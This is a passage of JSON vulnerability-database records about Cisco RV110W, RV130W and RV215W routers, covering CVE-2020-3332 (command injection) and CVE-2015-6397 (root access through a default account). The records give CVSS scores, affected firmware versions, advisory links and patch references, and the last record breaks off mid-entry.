"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2020-3332",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-008341",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-3332",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2020-3332",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-008341",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202007-1077",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-3332",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker to inject arbitrary shell commands that are executed by an affected device. The vulnerability is due to insufficient input validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary shell commands or scripts with root privileges on the affected device",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "VULMON",
"id": "CVE-2020-3332"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-3332",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341",
"trust": 0.8
},
{
"db": "AUSCERT",
"id": "ESB-2020.2417",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48358",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-3332",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"id": "VAR-202007-1023",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.533139435
},
"last_update_date": "2024-11-23T21:59:08.724000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-cmd-shell-injection-9jOQn9Dy",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cmd-shell-injection-9jOQn9Dy"
},
{
"title": "Multiple Cisco Product operating system command injection vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124154"
},
{
"title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Series Routers Command Shell Injection Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-cmd-shell-injection-9jOQn9Dy"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-cmd-shell-injection-9joqn9dy"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-3332"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3332"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48358"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"date": "2020-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"date": "2020-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"date": "2020-07-16T18:15:17.457000",
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-23T00:00:00",
"db": "VULMON",
"id": "CVE-2020-3332"
},
{
"date": "2020-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1077"
},
{
"date": "2024-11-21T05:30:49.170000",
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Small Business RV In series routers OS Command injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1077"
}
],
"trust": 0.6
}
}
var-201608-0274
Vulnerability from variot
Cisco RV110W, RV130W, and RV215W devices have an incorrect RBAC configuration for the default account, which allows remote authenticated users to obtain root access via a login session with that account, aka Bug IDs CSCuv90139, CSCux58175, and CSCux73557. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco routers are prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCuv90139 CSCux58175 CSCux73557
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0274",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.1.7"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "BID",
"id": "92273"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Adam Zielinski",
"sources": [
{
"db": "BID",
"id": "92273"
}
],
"trust": 0.3
},
"cve": "CVE-2015-6397",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2015-6397",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2016-06160",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-84358",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2015-6397",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-6397",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-6397",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2016-06160",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201608-174",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-84358",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "VULHUB",
"id": "VHN-84358"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco RV110W, RV130W, and RV215W devices have an incorrect RBAC configuration for the default account, which allows remote authenticated users to obtain root access via a login session with that account, aka Bug IDs CSCuv90139, CSCux58175, and CSCux73557. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco routers are prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. \nThis issue is tracked by Cisco Bug ID CSCuv90139 CSCux58175 CSCux73557",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-6397"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "BID",
"id": "92273"
},
{
"db": "VULHUB",
"id": "VHN-84358"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-6397",
"trust": 3.4
},
{
"db": "BID",
"id": "92273",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1036524",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-06160",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-84358",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "VULHUB",
"id": "VHN-84358"
},
{
"db": "BID",
"id": "92273"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"id": "VAR-201608-0274",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "VULHUB",
"id": "VHN-84358"
}
],
"trust": 1.233139435
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
}
]
},
"last_update_date": "2024-11-23T22:52:39.564000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160803-rv110_130w2",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w2"
},
{
"title": "Patches for multiple Cisco product security bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/80247"
},
{
"title": "Cisco RV110W , RV130W and RV215W Repair measures for device security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63567"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84358"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w2"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/92273"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036524"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6397"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6397"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "VULHUB",
"id": "VHN-84358"
},
{
"db": "BID",
"id": "92273"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"db": "VULHUB",
"id": "VHN-84358"
},
{
"db": "BID",
"id": "92273"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"date": "2016-08-08T00:00:00",
"db": "VULHUB",
"id": "VHN-84358"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92273"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"date": "2016-08-08T00:59:01.267000",
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06160"
},
{
"date": "2017-08-16T00:00:00",
"db": "VULHUB",
"id": "VHN-84358"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92273"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007227"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-174"
},
{
"date": "2024-11-21T02:34:55.440000",
"db": "NVD",
"id": "CVE-2015-6397"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco In device products root Vulnerability for which access rights are acquired",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007227"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-174"
}
],
"trust": 0.6
}
}
var-201810-0303
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to gain access to sensitive configuration information, including user authentication credentials. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.44"
},
{
"model": "rv215w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w",
"scope": "lte",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
